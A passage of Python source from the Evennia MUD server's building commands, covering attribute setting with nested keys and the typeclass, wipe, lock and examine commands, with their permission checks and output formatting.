by you starting your value with one of |c'|n, |c"|n, |c(|n, |c[|n
or |c{ |n.
Once you have stored a Python primitive as noted above, you can include
|c[<key>]|n in <attr> to reference nested values in e.g. a list or dict.
Remember that if you use Python primitives like this, you must
write proper Python syntax too - notably you must include quotes
around your strings or you will get an error.
"""
key = "@set"
locks = "cmd:perm(set) or perm(Builder)"
help_category = "Building"
nested_re = re.compile(r"\[.*?\]")
not_found = object()
def check_obj(self, obj):
"""
This may be overridden by subclasses in case restrictions need to be
placed on whether certain objects can have attributes set by certain
accounts.
This function is expected to display its own error message.
Returning False will abort the command.
"""
return True
def check_attr(self, obj, attr_name, category):
"""
This may be overridden by subclasses in case restrictions need to be
placed on what attributes can be set by who beyond the normal lock.
This functions is expected to display its own error message. It is
run once for every attribute that is checked, blocking only those
attributes which are not permitted and letting the others through.
"""
return attr_name
def split_nested_attr(self, attr):
"""
Yields tuples of (possible attr name, nested keys on that attr).
For performance, this is biased to the deepest match, but allows compatability
with older attrs that might have been named with `[]`'s.
> list(split_nested_attr("nested['asdf'][0]"))
[
('nested', ['asdf', 0]),
("nested['asdf']", [0]),
("nested['asdf'][0]", []),
]
"""
quotes = "\"'"
def clean_key(val):
val = val.strip("[]")
if val[0] in quotes:
return val.strip(quotes)
if val[0] == LIST_APPEND_CHAR:
# List insert/append syntax
return val
try:
return int(val)
except ValueError:
return val
parts = self.nested_re.findall(attr)
base_attr = ""
if parts:
base_attr = attr[: attr.find(parts[0])]
for index, part in enumerate(parts):
yield (base_attr, [clean_key(p) for p in parts[index:]])
base_attr += part
yield (attr, [])
def do_nested_lookup(self, value, *keys):
result = value
for key in keys:
try:
result = result.__getitem__(key)
except (IndexError, KeyError, TypeError):
return self.not_found
return result
def view_attr(self, obj, attr, category):
"""
Look up the value of an attribute and return a string displaying it.
"""
nested = False
for key, nested_keys in self.split_nested_attr(attr):
nested = True
if obj.attributes.has(key):
val = obj.attributes.get(key)
val = self.do_nested_lookup(val, *nested_keys)
if val is not self.not_found:
return f"\nAttribute {obj.name}/|w{attr}|n [category:{category}] = {val}"
error = f"\nAttribute {obj.name}/|w{attr} [category:{category}] does not exist."
if nested:
error += " (Nested lookups attempted)"
return error
def rm_attr(self, obj, attr, category):
"""
Remove an attribute from the object, or a nested data structure, and report back.
"""
nested = False
for key, nested_keys in self.split_nested_attr(attr):
nested = True
if obj.attributes.has(key, category):
if nested_keys:
del_key = nested_keys[-1]
val = obj.attributes.get(key, category=category)
deep = self.do_nested_lookup(val, *nested_keys[:-1])
if deep is not self.not_found:
try:
del deep[del_key]
except (IndexError, KeyError, TypeError):
continue
return f"\nDeleted attribute {obj.name}/|w{attr}|n [category:{category}]."
else:
exists = obj.attributes.has(key, category)
if exists:
obj.attributes.remove(attr, category=category)
return f"\nDeleted attribute {obj.name}/|w{attr}|n [category:{category}]."
else:
return (f"\nNo attribute {obj.name}/|w{attr}|n [category: {category}] "
"was found to delete.")
error = f"\nNo attribute {obj.name}/|w{attr}|n [category: {category}] was found to delete."
if nested:
error += " (Nested lookups attempted)"
return error
def set_attr(self, obj, attr, value, category):
done = False
for key, nested_keys in self.split_nested_attr(attr):
if obj.attributes.has(key, category) and nested_keys:
acc_key = nested_keys[-1]
lookup_value = obj.attributes.get(key, category)
deep = self.do_nested_lookup(lookup_value, *nested_keys[:-1])
if deep is not self.not_found:
# To support appending and inserting to lists
# a key that starts with LIST_APPEND_CHAR will insert a new item at that
# location, and move the other elements down.
# Using LIST_APPEND_CHAR alone will append to the list
if isinstance(acc_key, str) and acc_key[0] == LIST_APPEND_CHAR:
try:
if len(acc_key) > 1:
where = int(acc_key[1:])
deep.insert(where, value)
else:
deep.append(value)
except (ValueError, AttributeError):
pass
else:
value = lookup_value
attr = key
done = True
break
# List magic failed, just use like a key/index
try:
deep[acc_key] = value
except TypeError as err:
# Tuples can't be modified
return f"\n{err} - {deep}"
value = lookup_value
attr = key
done = True
break
verb = "Modified" if obj.attributes.has(attr) else "Created"
try:
if not done:
obj.attributes.add(attr, value, category)
return f"\n{verb} attribute {obj.name}/|w{attr}|n [category:{category}] = {value}"
except SyntaxError:
# this means literal_eval tried to parse a faulty string
return (
"\n|RCritical Python syntax error in your value. Only "
"primitive Python structures are allowed.\nYou also "
"need to use correct Python syntax. Remember especially "
"to put quotes around all strings inside lists and "
"dicts.|n"
)
@interactive
def edit_handler(self, obj, attr, caller):
"""Activate the line editor"""
def load(caller):
"""Called for the editor to load the buffer"""
try:
old_value = obj.attributes.get(attr, raise_exception=True)
except AttributeError:
# we set empty buffer on nonexisting Attribute because otherwise
# we'd always have the string "None" in the buffer to start with
old_value = ''
return str(old_value) # we already confirmed we are ok with this
def save(caller, buf):
"""Called when editor saves its buffer."""
obj.attributes.add(attr, buf)
caller.msg("Saved Attribute %s." % attr)
# check non-strings before activating editor
try:
old_value = obj.attributes.get(attr, raise_exception=True)
if not isinstance(old_value, str):
answer = yield(
f"|rWarning: Attribute |w{attr}|r is of type |w{type(old_value).__name__}|r. "
"\nTo continue editing, it must be converted to (and saved as) a string. "
"Continue? [Y]/N?")
if answer.lower() in ('n', 'no'):
self.caller.msg("Aborted edit.")
return
except AttributeError:
pass
# start the editor
EvEditor(self.caller, load, save, key=f"{obj}/{attr}")
def search_for_obj(self, objname):
"""
Searches for an object matching objname. The object may be of different typeclasses.
Args:
objname: Name of the object we're looking for
Returns:
A typeclassed object, or None if nothing is found.
"""
from evennia.utils.utils import variable_from_module
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit(".", 1))
caller = self.caller
if objname.startswith("*") or "account" in self.switches:
found_obj = caller.search_account(objname.lstrip("*"))
elif "script" in self.switches:
found_obj = _AT_SEARCH_RESULT(search.search_script(objname), caller)
elif "channel" in self.switches:
found_obj = _AT_SEARCH_RESULT(search.search_channel(objname), caller)
else:
global_search = True
if "char" in self.switches or "character" in self.switches:
typeclass = settings.BASE_CHARACTER_TYPECLASS
elif "room" in self.switches:
typeclass = settings.BASE_ROOM_TYPECLASS
elif "exit" in self.switches:
typeclass = settings.BASE_EXIT_TYPECLASS
else:
global_search = False
typeclass = None
found_obj = caller.search(objname, global_search=global_search, typeclass=typeclass)
return found_obj
def func(self):
"""Implement the set attribute - a limited form of py."""
caller = self.caller
if not self.args:
caller.msg("Usage: set obj/attr[:category] = value. Use empty value to clear.")
return
# get values prepared by the parser
value = self.rhs
objname = self.lhs_objattr[0]["name"]
attrs = self.lhs_objattr[0]["attrs"]
category = self.lhs_objs[0].get("option") # None if unset
obj = self.search_for_obj(objname)
if not obj:
return
if not self.check_obj(obj):
return
result = []
if "edit" in self.switches:
# edit in the line editor
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
caller.msg("You don't have permission to edit %s." % obj.key)
return
if len(attrs) > 1:
caller.msg("The Line editor can only be applied " "to one attribute at a time.")
return
if not attrs:
caller.msg("Use `set/edit <objname>/<attr>` to define the Attribute to edit.\nTo "
"edit the current room description, use `set/edit here/desc` (or "
"use the `desc` command).")
return
self.edit_handler(obj, attrs[0], caller)
return
if not value:
if self.rhs is None:
# no = means we inspect the attribute(s)
if not attrs:
attrs = [attr.key for attr in obj.attributes.get(category=None)]
for attr in attrs:
if not self.check_attr(obj, attr, category):
continue
result.append(self.view_attr(obj, attr, category))
# we view it without parsing markup.
self.caller.msg("".join(result).strip(), options={"raw": True})
return
else:
# deleting the attribute(s)
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
caller.msg("You don't have permission to edit %s." % obj.key)
return
for attr in attrs:
if not self.check_attr(obj, attr, category):
continue
result.append(self.rm_attr(obj, attr, category))
else:
# setting attribute(s). Make sure to convert to real Python type before saving.
# add support for $dbref() and $search() in set argument
global _ATTRFUNCPARSER
if not _ATTRFUNCPARSER:
_ATTRFUNCPARSER = funcparser.FuncParser(
{"dbref": funcparser.funcparser_callable_search,
"search": funcparser.funcparser_callable_search}
)
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
caller.msg("You don't have permission to edit %s." % obj.key)
return
for attr in attrs:
if not self.check_attr(obj, attr, category):
continue
# from evennia import set_trace;set_trace()
parsed_value = _ATTRFUNCPARSER.parse(value, return_str=False, caller=caller)
if hasattr(parsed_value, "access"):
# if this is an object we must have the right to read it, if so,
# we will not convert it to a string
if not (parsed_value.access(caller, "control")
or parsed_value.access(self.caller, "edit")):
caller.msg("You don't have permission to set "
f"object with identifier '{value}'.")
continue
value = parsed_value
else:
value = _convert_from_string(self, value)
result.append(self.set_attr(obj, attr, value, category))
# send feedback
caller.msg("".join(result).strip("\n"))
class CmdTypeclass(COMMAND_DEFAULT_CLASS):
"""
set or change an object's typeclass
Usage:
typeclass[/switch] <object> [= typeclass.path]
typeclass/prototype <object> = prototype_key
typeclasses or typeclass/list/show [typeclass.path]
swap - this is a shorthand for using /force/reset flags.
update - this is a shorthand for using the /force/reload flag.
Switch:
show, examine - display the current typeclass of object (default) or, if
given a typeclass path, show the docstring of that typeclass.
update - *only* re-run at_object_creation on this object
meaning locks or other properties set later may remain.
reset - clean out *all* the attributes and properties on the
object - basically making this a new clean object. This will also
reset cmdsets!
force - change to the typeclass also if the object
already has a typeclass of the same name.
list - show available typeclasses. Only typeclasses in modules actually
imported or used from somewhere in the code will show up here
(those typeclasses are still available if you know the path)
prototype - clean and overwrite the object with the specified
prototype key - effectively making a whole new object.
Example:
type button = examples.red_button.RedButton
type/prototype button=a red button
If the typeclass_path is not given, the current object's typeclass is
assumed.
View or set an object's typeclass. If setting, the creation hooks of the
new typeclass will be run on the object. If you have clashing properties on
the old class, use /reset. By default you are protected from changing to a
typeclass of the same name as the one you already have - use /force to
override this protection.
The given typeclass must be identified by its location using python
dot-notation pointing to the correct module and class. If no typeclass is
given (or a wrong typeclass is given). Errors in the path or new typeclass
will lead to the old typeclass being kept. The location of the typeclass
module is searched from the default typeclass directory, as defined in the
server settings.
"""
key = "@typeclass"
aliases = ["@type", "@parent", "@swap", "@update", "@typeclasses"]
switch_options = ("show", "examine", "update", "reset", "force", "list", "prototype")
locks = "cmd:perm(typeclass) or perm(Builder)"
help_category = "Building"
def _generic_search(self, query, typeclass_path):
caller = self.caller
if typeclass_path:
# make sure we search the right database table
try:
new_typeclass = class_from_module(typeclass_path)
except ImportError:
# this could be a prototype and not a typeclass at all
return caller.search(query)
dbclass = new_typeclass.__dbclass__
if caller.__dbclass__ == dbclass:
# object or account match
obj = caller.search(query)
if not obj:
return
elif (self.account and self.account.__dbclass__ == dbclass):
# applying account while caller is object
caller.msg(f"Trying to search {new_typeclass} with query '{self.lhs}'.")
obj = self.account.search(query)
if not obj:
return
elif hasattr(caller, "puppet") and caller.puppet.__dbclass__ == dbclass:
# applying object while caller is account
caller.msg(f"Trying to search {new_typeclass} with query '{self.lhs}'.")
obj = caller.puppet.search(query)
if not obj:
return
else:
# other mismatch between caller and specified typeclass
caller.msg(f"Trying to search {new_typeclass} with query '{self.lhs}'.")
obj = new_typeclass.search(query)
if not obj:
if isinstance(obj, list):
caller.msg(f"Could not find {new_typeclass} with query '{self.lhs}'.")
return
else:
# no rhs, use caller's typeclass
obj = caller.search(query)
if not obj:
return
return obj
def func(self):
"""Implements command"""
caller = self.caller
if "list" in self.switches or self.cmdname in ('typeclasses', '@typeclasses'):
tclasses = get_all_typeclasses()
contribs = [key for key in sorted(tclasses) if key.startswith("evennia.contrib")] or [
"<None loaded>"
]
core = [
key for key in sorted(tclasses) if key.startswith("evennia") and key not in contribs
] or ["<None loaded>"]
game = [key for key in sorted(tclasses) if not key.startswith("evennia")] or [
"<None loaded>"
]
string = (
"|wCore typeclasses|n\n"
" {core}\n"
"|wLoaded Contrib typeclasses|n\n"
" {contrib}\n"
"|wGame-dir typeclasses|n\n"
" {game}"
).format(
core="\n ".join(core), contrib="\n ".join(contribs), game="\n ".join(game)
)
EvMore(caller, string, exit_on_lastpage=True)
return
if not self.args:
caller.msg("Usage: %s <object> [= typeclass]" % self.cmdstring)
return
if "show" in self.switches or "examine" in self.switches:
oquery = self.lhs
obj = caller.search(oquery, quiet=True)
if not obj:
# no object found to examine, see if it's a typeclass-path instead
tclasses = get_all_typeclasses()
matches = [
(key, tclass) for key, tclass in tclasses.items() if key.endswith(oquery)
]
nmatches = len(matches)
if nmatches > 1:
caller.msg(
"Multiple typeclasses found matching {}:\n {}".format(
oquery, "\n ".join(tup[0] for tup in matches)
)
)
elif not matches:
caller.msg("No object or typeclass path found to match '{}'".format(oquery))
else:
# one match found
caller.msg(
"Docstring for typeclass '{}':\n{}".format(oquery, matches[0][1].__doc__)
)
else:
# do the search again to get the error handling in case of multi-match
obj = caller.search(oquery)
if not obj:
return
caller.msg(
"{}'s current typeclass is '{}.{}'".format(
obj.name, obj.__class__.__module__, obj.__class__.__name__
)
)
return
obj = self._generic_search(self.lhs, self.rhs)
if not obj:
return
if not hasattr(obj, "__dbclass__"):
string = "%s is not a typed object." % obj.name
caller.msg(string)
return
new_typeclass = self.rhs or obj.path
prototype = None
if "prototype" in self.switches:
key = self.rhs
prototype = protlib.search_prototype(key=key)
if len(prototype) > 1:
caller.msg(
"More than one match for {}:\n{}".format(
key, "\n".join(proto.get("prototype_key", "") for proto in prototype)
)
)
return
elif prototype:
# one match
prototype = prototype[0]
else:
# no match
caller.msg("No prototype '{}' was found.".format(key))
return
new_typeclass = prototype["typeclass"]
self.switches.append("force")
if "show" in self.switches or "examine" in self.switches:
string = "%s's current typeclass is %s." % (obj.name, obj.__class__)
caller.msg(string)
return
if self.cmdstring in ("swap", "@swap"):
self.switches.append("force")
self.switches.append("reset")
elif self.cmdstring in ("update", "@update"):
self.switches.append("force")
self.switches.append("update")
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
if not hasattr(obj, "swap_typeclass"):
caller.msg("This object cannot have a type at all!")
return
is_same = obj.is_typeclass(new_typeclass, exact=True)
if is_same and "force" not in self.switches:
string = (f"{obj.name} already has the typeclass '{new_typeclass}'. "
"Use /force to override.")
else:
update = "update" in self.switches
reset = "reset" in self.switches
hooks = "at_object_creation" if update and not reset else "all"
old_typeclass_path = obj.typeclass_path
# special prompt for the user in cases where we want
# to confirm changes.
if "prototype" in self.switches:
diff, _ = spawner.prototype_diff_from_object(prototype, obj)
txt = spawner.format_diff(diff)
prompt = (
"Applying prototype '%s' over '%s' will cause the follow changes:\n%s\n"
% (prototype["key"], obj.name, txt)
)
if not reset:
prompt += "\n|yWARNING:|n Use the /reset switch to apply the prototype over a blank state."
prompt += "\nAre you sure you want to apply these changes [yes]/no?"
answer = yield (prompt)
if answer and answer in ("no", "n"):
caller.msg("Canceled: No changes were applied.")
return
# we let this raise exception if needed
obj.swap_typeclass(
new_typeclass, clean_attributes=reset, clean_cmdsets=reset, run_start_hooks=hooks
)
if "prototype" in self.switches:
modified = spawner.batch_update_objects_with_prototype(
prototype, objects=[obj], caller=self.caller)
prototype_success = modified > 0
if not prototype_success:
caller.msg("Prototype %s failed to apply." % prototype["key"])
if is_same:
string = "%s updated its existing typeclass (%s).\n" % (obj.name, obj.path)
else:
string = "%s changed typeclass from %s to %s.\n" % (
obj.name,
old_typeclass_path,
obj.typeclass_path,
)
if update:
string += "Only the at_object_creation hook was run (update mode)."
else:
string += "All object creation hooks were run."
if reset:
string += " All old attributes where deleted before the swap."
else:
string += " Attributes set before swap were not removed."
if "prototype" in self.switches and prototype_success:
string += (
" Prototype '%s' was successfully applied over the object type."
% prototype["key"]
)
caller.msg(string)
class CmdWipe(ObjManipCommand):
"""
clear all attributes from an object
Usage:
wipe <object>[/<attr>[/<attr>...]]
Example:
wipe box
wipe box/colour
Wipes all of an object's attributes, or optionally only those
matching the given attribute-wildcard search string.
"""
key = "@wipe"
locks = "cmd:perm(wipe) or perm(Builder)"
help_category = "Building"
def func(self):
"""
inp is the dict produced in ObjManipCommand.parse()
"""
caller = self.caller
if not self.args:
caller.msg("Usage: wipe <object>[/<attr>/<attr>...]")
return
# get the attributes set by our custom parser
objname = self.lhs_objattr[0]["name"]
attrs = self.lhs_objattr[0]["attrs"]
obj = caller.search(objname)
if not obj:
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
if not attrs:
# wipe everything
obj.attributes.clear()
string = "Wiped all attributes on %s." % obj.name
else:
for attrname in attrs:
obj.attributes.remove(attrname)
string = "Wiped attributes %s on %s."
string = string % (",".join(attrs), obj.name)
caller.msg(string)
class CmdLock(ObjManipCommand):
"""
assign a lock definition to an object
Usage:
lock <object or *account>[ = <lockstring>]
or
lock[/switch] <object or *account>/<access_type>
Switch:
del - delete given access type
view - view lock associated with given access type (default)
If no lockstring is given, shows all locks on
object.
Lockstring is of the form
access_type:[NOT] func1(args)[ AND|OR][ NOT] func2(args) ...]
Where func1, func2 ... valid lockfuncs with or without arguments.
Separator expressions need not be capitalized.
For example:
'get: id(25) or perm(Admin)'
The 'get' lock access_type is checked e.g. by the 'get' command.
An object locked with this example lock will only be possible to pick up
by Admins or by an object with id=25.
You can add several access_types after one another by separating
them by ';', i.e:
'get:id(25); delete:perm(Builder)'
"""
key = "@lock"
aliases = ["@locks"]
locks = "cmd: perm(locks) or perm(Builder)"
help_category = "Building"
def func(self):
"""Sets up the command"""
caller = self.caller
if not self.args:
string = (
"Usage: lock <object>[ = <lockstring>] or lock[/switch] " "<object>/<access_type>"
)
caller.msg(string)
return
if "/" in self.lhs:
# call of the form lock obj/access_type
objname, access_type = [p.strip() for p in self.lhs.split("/", 1)]
obj = None
if objname.startswith("*"):
obj = caller.search_account(objname.lstrip("*"))
if not obj:
obj = caller.search(objname)
if not obj:
return
has_control_access = obj.access(caller, "control")
if access_type == "control" and not has_control_access:
# only allow to change 'control' access if you have 'control' access already
caller.msg("You need 'control' access to change this type of lock.")
return
if not (has_control_access or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
lockdef = obj.locks.get(access_type)
if lockdef:
if "del" in self.switches:
obj.locks.delete(access_type)
string = "deleted lock %s" % lockdef
else:
string = lockdef
else:
string = "%s has no lock of access type '%s'." % (obj, access_type)
caller.msg(string)
return
if self.rhs:
# we have a = separator, so we are assigning a new lock
if self.switches:
swi = ", ".join(self.switches)
caller.msg(
"Switch(es) |w%s|n can not be used with a "
"lock assignment. Use e.g. "
"|wlock/del objname/locktype|n instead." % swi
)
return
objname, lockdef = self.lhs, self.rhs
obj = None
if objname.startswith("*"):
obj = caller.search_account(objname.lstrip("*"))
if not obj:
obj = caller.search(objname)
if not obj:
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
ok = False
lockdef = re.sub(r"\'|\"", "", lockdef)
try:
ok = obj.locks.add(lockdef)
except LockException as e:
caller.msg(str(e))
if "cmd" in lockdef.lower() and inherits_from(
obj, "evennia.objects.objects.DefaultExit"
):
# special fix to update Exits since "cmd"-type locks won't
# update on them unless their cmdsets are rebuilt.
obj.at_init()
if ok:
caller.msg("Added lock '%s' to %s." % (lockdef, obj))
return
# if we get here, we are just viewing all locks on obj
obj = None
if self.lhs.startswith("*"):
obj = caller.search_account(self.lhs.lstrip("*"))
if not obj:
obj = caller.search(self.lhs)
if not obj:
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
caller.msg("\n".join(obj.locks.all()))
class CmdExamine(ObjManipCommand):
"""
get detailed information about an object
Usage:
examine [<object>[/attrname]]
examine [*<account>[/attrname]]
Switch:
account - examine an Account (same as adding *)
object - examine an Object (useful when OOC)
script - examine a Script
channel - examine a Channel
The examine command shows detailed game info about an
object and optionally a specific attribute on it.
If object is not specified, the current location is examined.
Append a * before the search string to examine an account.
"""
key = "@examine"
aliases = ["@ex", "@exam"]
locks = "cmd:perm(examine) or perm(Builder)"
help_category = "Building"
arg_regex = r"(/\w+?(\s|$))|\s|$"
switch_options = ["account", "object", "script", "channel"]
object_type = "object"
detail_color = "|c"
header_color = "|w"
quell_color = "|r"
separator = "-"
def msg(self, text):
"""
Central point for sending messages to the caller. This tags
the message as 'examine' for eventual custom markup in the client.
Attributes:
text (str): The text to send.
"""
self.caller.msg(text=(text, {"type": "examine"}))
def format_key(self, obj):
return f"{obj.name} ({obj.dbref})"
def format_aliases(self, obj):
if hasattr(obj, "aliases") and obj.aliases.all():
return ", ".join(utils.make_iter(str(obj.aliases)))
def format_typeclass(self, obj):
if hasattr(obj, "typeclass_path"):
return f"{obj.typename} ({obj.typeclass_path})"
def format_sessions(self, obj):
if hasattr(obj, "sessions"):
sessions = obj.sessions.all()
if sessions:
return ", ".join(f"#{sess.sessid}" for sess in obj.sessions.all())
def format_email(self, obj):
if hasattr(obj, "email") and obj.email:
return f"{self.detail_color}{obj.email}|n"
def format_account_key(self, account):
return f"{self.detail_color}{account.name}|n ({account.dbref})"
def format_account_typeclass(self, account):
return f"{account.typename} ({account.typeclass_path})"
def format_account_permissions(self, account):
perms = account.permissions.all()
if account.is_superuser:
perms = ["<Superuser>"]
elif not perms:
perms = ["<None>"]
perms = ", ".join(perms)
if account.attributes.has("_quell"):
perms += f" {self.quell_color}(quelled)|n"
return perms
def format_location(self, obj):
if hasattr(obj, "location") and obj.location:
return f"{obj.location.key} (#{obj.location.id})"
def format_home(self, obj):
if hasattr(obj, "home") and obj.home:
return f"{obj.home.key} (#{obj.home.id})"
def format_destination(self, obj):
if hasattr(obj, "destination") and obj.destination:
return f"{obj.destination.key} (#{obj.destination.id})"
def format_permissions(self, obj):
perms = obj.permissions.all()
if perms:
perms_string = ", ".join(perms)
if obj.is_superuser:
perms_string += " <Superuser>"
return perms_string
def format_locks(self, obj):
locks = str(obj.locks)
if locks:
return utils.fill(
"; ".join([lock for lock in locks.split(";")]), indent=2
)
return "Default"
def format_scripts(self, obj):
if hasattr(obj, "scripts") and hasattr(obj.scripts, "all") and obj.scripts.all():
return f"{obj.scripts}"
def format_single_tag(self, tag):
if tag.db_category:
return f"{tag.db_key}[{tag.db_category}]"
else:
return f"{tag.db_key}"
def format_tags(self, obj):
if hasattr(obj, "tags"):
tags = sorted(obj.tags.all(return_objs=True))
if tags:
formatted_tags = [self.format_single_tag(tag) for tag in tags]
return utils.fill(", ".join(formatted_tags), indent=2)
def format_single_cmdset_options(self, cmdset):
def _truefalse(string, value):
if value is None:
return ""
if value:
return f"{string}: T"
return f"{string}: F"
return ", ".join(
_truefalse(opt, getattr(cmdset, opt))
for opt in ("no_exits", "no_objs", "no_channels", "duplicates")
if getattr(cmdset, opt) is not None
)
def format_single_cmdset(self, cmdset):
options = self.format_single_cmdset_options(cmdset)
return f"{cmdset.path} [{cmdset.key}] ({cmdset.mergetype}, prio {cmdset.priority}{options}"
def format_stored_cmdsets(self, obj):
if hasattr(obj, "cmdset"):
stored_cmdset_strings = []
stored_cmdsets = sorted(obj.cmdset.all(), key=lambda x: x.priority, reverse=True)
for cmdset in stored_cmdsets:
if cmdset.key != "_EMPTY_CMDSET":
stored_cmdset_strings.append(self.format_single_cmdset(cmdset))
return "\n " + "\n ".join(stored_cmdset_strings)
def format_merged_cmdsets(self, obj, current_cmdset):
if not hasattr(obj, "cmdset"):
return None
all_cmdsets = [(cmdset.key, cmdset) for cmdset in current_cmdset.merged_from]
# we always at least try to add account- and session sets since these are ignored
# if we merge on the object level.
if hasattr(obj, "account") and obj.account:
# get Attribute-cmdsets if they exist
all_cmdsets.extend([(cmdset.key, cmdset) for cmdset in obj.account.cmdset.all()])
if obj.sessions.count():
# if there are more sessions than one on objects it's because of multisession mode
# we only show the first session's cmdset here (it is -in principle- possible
# that different sessions have different cmdsets but for admins who want such
# madness it is better that they overload with their own CmdExamine to handle it).
all_cmdsets.extend([(cmdset.key, cmdset)
for cmdset in obj.account.sessions.all()[0].cmdset.all()])
else:
try:
# we have to protect this since many objects don't have sessions.
all_cmdsets.extend([(cmdset.key, cmdset)
for cmdset in obj.get_session(obj.sessions.get()).cmdset.all()])
except (TypeError, AttributeError):
# an error means we are merging an object without a session
pass
all_cmdsets = [cmdset for cmdset in dict(all_cmdsets).values()]
all_cmdsets.sort(key=lambda x: x.priority, reverse=True)
merged_cmdset_strings = []
for cmdset in all_cmdsets:
if cmdset.key != "_EMPTY_CMDSET":
merged_cmdset_strings.append(self.format_single_cmdset(cmdset))
return "\n " + "\n ".join(merged_cmdset_strings)
def format_current_cmds(self, obj, current_cmdset):
current_commands = sorted([cmd.key for cmd in current_cmdset if cmd.access(obj, "cmd")])
return "\n" + utils.fill(", ".join(current_commands), indent=2)
def _get_attribute_value_type(self, attrvalue):
typ = ""
if not isinstance(attrvalue, str):
try:
name = attrvalue.__class__.__name__
except AttributeError:
try:
name = attrvalue.__name__
except AttributeError:
name = attrvalue
if str(name).startswith("_Saver"):
try:
typ = str(type(deserialize(attrvalue)))
except Exception:
typ = str(type(deserialize(attrvalue)))
else:
typ = str(type(attrvalue))
return typ
def format_single_attribute_detail(self, obj, attr):
global _FUNCPARSER
if not _FUNCPARSER:
_FUNCPARSER = funcparser.FuncParser(settings.FUNCPARSER_OUTGOING_MESSAGES_MODULES)
key, category, value = attr.db_key, attr.db_category, attr.value
typ = self._get_attribute_value_type(value)
typ = f" |B[type: {typ}]|n" if typ else ""
value = utils.to_str(value)
value = _FUNCPARSER.parse(ansi_raw(value), escape=True)
return (f"Attribute {obj.name}/{self.header_color}{key}|n "
f"[category={category}]{typ}:\n\n{value}")
def format_single_attribute(self, attr):
global _FUNCPARSER
if not _FUNCPARSER:
_FUNCPARSER = funcparser.FuncParser(settings.FUNCPARSER_OUTGOING_MESSAGES_MODULES)
key, category, value = attr.db_key, attr.db_category, attr.value
typ = self._get_attribute_value_type(value)
typ = f" |B[type: {typ}]|n" if typ else ""
value = utils.to_str(value)
value = _FUNCPARSER.parse(ansi_raw(value), escape=True)
value = utils.crop(value)
if category:
return f"{self.header_color}{key}|n[{category}]={value}{typ}"
else:
return f"{self.header_color}{key}|n={value}{typ}"
def format_attributes(self, obj):
output = "\n " + "\n ".join(
sorted(self.format_single_attribute(attr)
for attr in obj.db_attributes.all())
)
if output.strip():
# we don't want just an empty line
return output
def format_nattributes(self, obj):
try:
ndb_attr = obj.nattributes.all(return_tuples=True)
except Exception:
return
if ndb_attr and ndb_attr[0]:
return "\n " + " \n".join(
sorted(self.format_single_attribute(attr)
for attr, value in ndb_attr)
)
def format_exits(self, obj):
if hasattr(obj, "exits"):
exits = ", ".join(f"{exit.name}({exit.dbref})" for exit in obj.exits)
return exits if exits else None
def format_chars(self, obj):
if hasattr(obj, "contents"):
chars = ", ".join(f"{obj.name}({obj.dbref})" for obj in obj.contents
if obj.account)
return chars if chars else None
def format_things(self, obj):
if hasattr(obj, "contents"):
things = ", ".join(f"{obj.name}({obj.dbref})" for obj in obj.contents
if not obj.account and not obj.destination)
return things if things else None
def format_script_desc(self, obj):
if hasattr(obj, "db_desc") and obj.db_desc:
return crop(obj.db_desc, 20)
def format_script_is_persistent(self, obj):
if hasattr(obj, "db_persistent"):
return "T" if obj.db_persistent else "F"
def format_script_timer_data(self, obj):
if hasattr(obj, "db_interval") and obj.db_interval > 0:
start_delay = "T" if obj.db_start_delay else "F"
next_repeat = obj.time_until_next_repeat()
active = "|grunning|n" if obj.db_is_active and next_repeat else "|rinactive|n"
interval = obj.db_interval
next_repeat = "N/A" if next_repeat is None else f"{next_repeat}s"
repeats = ""
if obj.db_repeats:
remaining_repeats = obj.remaining_repeats()
remaining_repeats = 0 if remaining_repeats is None else remaining_repeats
repeats = f" - {remaining_repeats}/{obj.db_repeats} remain"
return (f"{active} - interval: {interval}s "
f"(next: {next_repeat}{repeats}, start_delay: {start_delay})")
def format_channel_sub_totals(self, obj):
if hasattr(obj, "db_account_subscriptions"):
account_subs = obj.db_account_subscriptions.all()
object_subs = obj.db_object_subscriptions.all()
online = len(obj.subscriptions.online())
ntotal = account_subs.count() + object_subs.count()
return f"{ntotal} ({online} online)"
def format_channel_account_subs(self, obj):
if hasattr(obj, "db_account_subscriptions"):
account_subs = obj.db_account_subscriptions.all()
if account_subs:
return "\n " + "\n ".join(
format_grid([sub.key for sub in account_subs], sep=' ', width=_DEFAULT_WIDTH))
def format_channel_object_subs(self, obj):
if hasattr(obj, "db_object_subscriptions"):
object_subs = obj.db_object_subscriptions.all()
if object_subs:
return "\n " + "\n ".join(
format_grid([sub.key for sub in object_subs], sep=' ', width=_DEFAULT_WIDTH))
def get_formatted_obj_data(self, obj, current_cmdset):
"""
Calls all other `format_*` methods.
"""
objdata = {}
objdata["Name/key"] = self.format_key(obj)
objdata["Aliases"] = self.format_aliases(obj)
objdata["Typeclass"] = self.format_typeclass(obj)
objdata["Sessions"] = self.format_sessions(obj)
objdata["Email"] = self.format_email(obj)
if hasattr(obj, "has_account") and obj.has_account:
objdata["Account"] = self.format_account_key(obj.account)
objdata[" Account Typeclass"] = self.format_account_typeclass(obj.account)
objdata[" Account Permissions"] = self.format_account_permissions(obj.account)
objdata["Location"] = self.format_location(obj)
objdata["Home"] = self.format_home(obj)
objdata["Destination"] = self.format_destination(obj)
objdata["Permissions"] = self.format_permissions(obj)
objdata["Locks"] = self.format_locks(obj)
if (current_cmdset
and not (len(obj.cmdset.all()) == 1
and obj.cmdset.current.key == "_EMPTY_CMDSET")):
objdata["Stored Cmdset(s)"] = self.format_stored_cmdsets(obj)
objdata["Merged Cmdset(s)"] = self.format_merged_cmdsets(obj, current_cmdset)
objdata[f"Commands vailable to {obj.key} (result of Merged Cmdset(s))"] = (
self.format_current_cmds(obj, current_cmdset))
if self.object_type == "script":
objdata["Description"] = self.format_script_desc(obj)
objdata["Persistent"] = self.format_script_is_persistent(obj)
objdata["Script Repeat"] = self.format_script_timer_data(obj)
